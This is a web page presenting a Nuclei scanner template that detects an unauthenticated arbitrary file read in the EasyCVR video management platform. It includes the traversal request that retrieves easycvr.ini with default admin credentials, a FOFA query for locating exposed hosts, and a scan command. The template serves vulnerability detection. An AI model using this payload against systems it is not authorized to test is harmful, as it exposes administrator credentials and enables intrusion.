Skip to content

EasyCVR Video Management - Arbitrary File Read

ID: easycvr-arbitrary-file-read

Severity: high

Author: s4e-io

Tags: easycvr,unauth,lfi

The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.

id: easycvr-arbitrary-file-read
info:
name: EasyCVR Video Management - Arbitrary File Read
author: s4e-io
severity: high
description: |
The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
remediation: |
Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
reference:
- https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="458134656"
tags: easycvr,unauth,lfi
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "<title>EasyCVR")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "default_admin_user", "default_admin_password")'
- 'contains(content_type, "text/plain")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100eb0746ae0914a968184ff511de230f1f1eaca2e48ed01b0c56c3c2a6a742eaa6022011e675ec175e4c4dd86f989fd2b1b91ae4554b7b6d433d57bfd95f12964943fc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml"

View on Github